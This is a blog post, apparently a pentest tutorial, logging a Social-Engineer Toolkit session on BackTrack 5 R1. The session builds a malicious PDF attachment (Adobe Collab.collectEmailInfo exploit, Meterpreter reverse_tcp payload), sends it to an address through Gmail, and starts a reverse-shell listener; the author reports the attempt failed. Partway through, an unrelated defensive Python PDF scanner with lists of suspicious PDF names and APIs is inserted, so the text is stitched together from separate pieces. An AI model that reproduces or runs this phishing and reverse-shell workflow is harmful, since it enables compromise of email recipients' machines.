Metasploit spear-phishing attack vector (failed on BT5R1)

Source: Internet | Published under: Cloud Computing, Chinese Academy of Sciences | Editor: 程序博客网 | Time: 2024/04/29 19:17
root@root:~# cd /pentest/exploits/set/
root@root:/pentest/exploits/set# ./set

                :::===  :::===== :::====
                :::     :::      :::====
                 =====  ======     ===
                    === ===        ===
                ======  ========   ===

  [---]       The Social-Engineer Toolkit (SET)          [---]
  [---]        Created by: David Kennedy (ReL1K)         [---]
  [---]        Development Team: Thomas Werth            [---]
  [---]        Development Team: JR DePre (pr1me)        [---]
  [---]        Development Team: Joey Furr (j0fer)       [---]
  [---]                Version: 2.0.3                    [---]
  [---]           Codename: 'Trebuchet Edition'          [---]
  [---]        Report bugs to: davek@secmaniac.com       [---]
  [---]         Follow me on Twitter: dave_rel1k         [---]
  [---]        Homepage: http://www.secmaniac.com        [---]

   Welcome to the Social-Engineer Toolkit (SET). Your one
    stop shop for all of your social-engineering needs..

       DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com.

    Join us on irc.freenode.net in channel #setoolkit

 Select from the menu:

  1) Spear-Phishing Attack Vectors
  2) Website Attack Vectors
  3) Infectious Media Generator
  4) Create a Payload and Listener
  5) Mass Mailer Attack
  6) Arduino-Based Attack Vector
  7) SMS Spoofing Attack Vector
  8) Wireless Access Point Attack Vector
  9) Third Party Modules
 10) Update the Metasploit Framework
 11) Update the Social-Engineer Toolkit
 12) Help, Credits, and About

 99) Exit the Social-Engineer Toolkit

set > 1

 The Spearphishing module allows you to specially craft email messages and send
 them to a large (or small) number of people with attached fileformat malicious
 payloads. If you want to spoof your email address, be sure "Sendmail" is
 installed (it is installed in BT4) and change the config/set_config SENDMAIL=OFF flag
 to SENDMAIL=ON.

 There are two options, one is getting your feet wet and letting SET do
 everything for you (option 1), the second is to create your own FileFormat
 payload and use it in your own attack. Either way, good luck and enjoy!

   1) Perform a Mass Email Attack
   2) Create a FileFormat Payload
   3) Create a Social-Engineering Template

  99) Return to Main Menu

set:phishing > 1

 Select the file format exploit you want.
 The default is the PDF embedded EXE.

           ********** PAYLOADS **********

   1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
   2) SET Custom Written Document UNC LM SMB Capture Attack
   3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
   4) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
   5) Adobe Flash Player "Button" Remote Code Execution
   6) Adobe CoolType SING Table "uniqueName" Overflow
   7) Adobe Flash Player "newfunction" Invalid Pointer Use
   8) Adobe Collab.collectEmailInfo Buffer Overflow
   9) Adobe Collab.getIcon Buffer Overflow
  10) Adobe JBIG2Decode Memory Corruption Exploit
  11) Adobe PDF Embedded EXE Social Engineering
  12) Adobe util.printf() Buffer Overflow
  13) Custom EXE to VBA (sent via RAR) (RAR required)
  14) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
  15) Adobe PDF Embedded EXE Social Engineering (NOJS)
  16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
  17) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow

set:payloads > 8

   1) Windows Reverse TCP Shell              Spawn a command shell on victim and send back to attacker
   2) Windows Meterpreter Reverse_TCP        Spawn a meterpreter shell on victim and send back to attacker
   3) Windows Reverse VNC DLL                Spawn a VNC server on victim and send back to attacker
   4) Windows Reverse TCP Shell (x64)        Windows X64 Command Shell, Reverse TCP Inline
   5) Windows Meterpreter Reverse_TCP (X64)  Connect back to the attacker (Windows x64), Meterpreter
   6) Windows Shell Bind_TCP (X64)           Execute payload and create an accepting port on remote system
   7) Windows Meterpreter Reverse HTTPS      Tunnel communication over HTTP using SSL and use Meterpreter

set:payloads > 2
set:payloads > Port to connect back on [443]:
[-] Defaulting to port 443...
[-] Generating fileformat exploit...
[*] Payload creation complete.
[*] All payloads get sent to the src/program_junk/src/program_junk/template.pdf directory
[-] As an added bonus, use the file-format creator in SET to create your attachment.

   Right now the attachment will be imported with filename of 'template.whatever'

   Do you want to rename the file?

   example Enter the new filename: moo.pdf

    1. Keep the filename, I don't care.
    2. Rename the file, I want to be cool.

set:phishing > 1
[*] Keeping the filename and moving on.

   Social Engineer Toolkit Mass E-Mailer

   There are two options on the mass e-mailer, the first would
   be to send an email to one individual person. The second option
   will allow you to import a list and send it to as many people as
   you want within that list.

   What do you want to do:

   1.  E-Mail Attack Single Email Address
   2.  E-Mail Attack Mass Mailer

   99. Return to main menu.

   set:phishing > 1

   Do you want to use a predefined template or craft
   a one time email template.

    1. Pre-Defined Template
    2. One-Time Use Email Template

set:phishing > 1
[-] Available templates:
1: WOAAAA!!!!!!!!!! This is crazy...
2: How long has it been?
3: Have you seen this?
4: Baby Pics
5: Dan Brown's Angels & Demons
6: New Update
7: Computer Issue
8: Status Report
9: Strange internet usage from your computer
set:phishing > 8
set:phishing > Send email to: feier7501@126.com

  1. Use a gmail Account for your email attack.
  2. Use your own server or open relay

set:phishing > 1
set:phishing > Your gmail email address: : feier7501@gmail.com
Email password:
set:phishing >


set:phishing > Flag this message/s as high priority? [yes|no]: no
[*] SET has finished delivering the emails
set:phishing > Setup a listener [yes|no]: Unhandled exception in thread started by
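The attachment SET mails in the session above is a PDF whose content triggers Reader JavaScript (option 8 is the Adobe Collab.collectEmailInfo bug; options 9 and 12 use Collab.getIcon and util.printf; option 11 drops an embedded EXE). The script below is an added example, not part of the original post or of SET, showing the kind of attachment triage a mail gateway or analyst can run on such a file from the receiving side: it inflates FlateDecode streams and counts the PDF names and Reader API strings that these attachment classes need. The sample PDFs are constructed inline for the demonstration; the helper names and the indicator lists are my own choices, and hits are triage signals rather than a verdict, since legitimate forms also use some of these names.

```python
import re
import zlib

# PDF names that auto-run or embedded-content attachments need. Legitimate
# forms use some of them too, so hits are triage signals, not a verdict.
SUSPICIOUS_NAMES = (b"/JavaScript", b"/JS", b"/OpenAction", b"/AA",
                    b"/EmbeddedFile", b"/Launch")
# Reader JavaScript APIs behind the fileformat payloads listed in the SET menu
# (Collab.collectEmailInfo, Collab.getIcon, util.printf) and the one an
# embedded-EXE attachment needs to drop its file (exportDataObject).
SUSPICIOUS_STRINGS = (b"Collab.collectEmailInfo", b"Collab.getIcon",
                      b"util.printf", b"exportDataObject")

STREAM_START_RE = re.compile(rb"(?<!end)stream\r?\n")          # skip "endstream"
LENGTH_RE = re.compile(rb"/Length\s+(\d+)\b(?!\s+\d+\s+R)")     # direct /Length only


def inflate_streams(data: bytes) -> bytes:
    """Return data with every FlateDecode stream body inflated in place, so
    indicators hidden inside compressed objects become visible to a byte scan."""
    out = bytearray()
    pos = 0
    for m in STREAM_START_RE.finditer(data):
        if m.start() < pos:           # keyword found inside a body already consumed
            continue
        head = data[max(0, m.start() - 400):m.start()]
        dictionary = head[head.rfind(b"obj"):] if b"obj" in head else head
        start = m.end()
        length = LENGTH_RE.search(dictionary)
        if length:
            end = start + int(length.group(1))
        else:                         # no direct /Length: fall back to the keyword
            end = data.find(b"endstream", start)
            if end < 0:
                break
        body = data[start:end]
        if b"/FlateDecode" in dictionary:
            try:
                body = zlib.decompress(body)
            except zlib.error:
                pass                  # truncated or non-zlib data: keep raw bytes
        out += data[pos:start] + body
        pos = end
    out += data[pos:]
    return bytes(out)


def scan_pdf(data: bytes, inflate: bool = True) -> dict:
    """Count indicator hits in a PDF. Returns {"indicators": {...}, "score": n}.
    inflate=False shows what a naive byte scan misses."""
    text = inflate_streams(data) if inflate else data
    hits = {}
    for name in SUSPICIOUS_NAMES:
        n = len(re.findall(re.escape(name) + rb"(?![A-Za-z0-9_])", text))
        if n:
            hits[name.decode()] = n
    for s in SUSPICIOUS_STRINGS:
        n = text.count(s)
        if n:
            hits[s.decode()] = n
    return {"indicators": hits, "score": sum(hits.values())}


def build_sample_pdf(js: bytes = b"", compress: bool = False) -> bytes:
    """Constructed sample (hypothetical helper): a minimal one-page PDF; if js is
    given it is wired up as an /OpenAction JavaScript action, optionally inside a
    FlateDecode stream the way real generators store it."""
    objs = [b"<< /Type /Catalog /Pages 2 0 R" +
            (b" /OpenAction 4 0 R" if js else b"") + b" >>",
            b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
            b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 200 200] >>"]
    if js and compress:
        body = zlib.compress(js)
        objs.append(b"<< /S /JavaScript /JS 5 0 R >>")
        objs.append(b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(body)
                    + body + b"\nendstream")
    elif js:
        objs.append(b"<< /S /JavaScript /JS (" + js + b") >>")
    out = b"%PDF-1.4\n"
    for i, obj in enumerate(objs, 1):
        out += b"%d 0 obj\n" % i + obj + b"\nendobj\n"
    return out + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


if __name__ == "__main__":
    js = b"util.printf('%d', 1);"    # constructed, harmless script body
    for label, pdf in (("clean", build_sample_pdf()),
                       ("plain js", build_sample_pdf(js)),
                       ("deflated js", build_sample_pdf(js, compress=True))):
        print(label, scan_pdf(pdf), "raw-only score:", scan_pdf(pdf, inflate=False)["score"])
```

The deflated sample is the case that matters in practice: the `/OpenAction` and `/JavaScript` names stay visible in the object dictionaries, but the API call inside the compressed stream only shows up once the stream is inflated, which is why a gateway rule that greps the raw attachment undercounts. Real attachments may also use indirect `/Length` references, other filters or object streams, which this heuristic does not decode.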

I entered yes:

yes
[-] ***
[-] * WARNING: Database support has been disabled
[-] ***

Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
EFLAGS: 00010046
eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
ds: 0018   es: 0018  ss: 0018
Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)

Stack: 90909090990909090990909090
       90909090990909090990909090
       90909090.90909090.90909090
       90909090.90909090.90909090
       90909090.90909090.09090900
       90909090.90909090.09090900
       ..........................
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       ccccccccc.................
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       .................ccccccccc
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       ..........................
       ffffffffffffffffffffffffff
       ffffffff..................
       ffffffffffffffffffffffffff
       ffffffff..................
       ffffffff..................
       ffffffff..................

Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00
Aiee, Killing Interrupt handler
Kernel panic: Attempted to kill the idle task!
In swapper task - not syncing


       =[ metasploit v4.0.0-release [core:4.0 api:1.0]
+ -- --=[ 716 exploits - 361 auxiliary - 68 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
       =[ svn r13462 updated 652 days ago (2011.08.01)

Warning: This copy of the Metasploit Framework was last updated 652 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             https://community.rapid7.com/docs/DOC-1306

resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 192.168.1.11
LHOST => 192.168.1.11
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf  exploit(handler) > [*] Started reverse handler on 192.168.1.11:443
[*] Starting the payload handler...

The step above threw an exception, and my 126 mailbox never received the email either.

This is BT5R1; I'll try a different version.
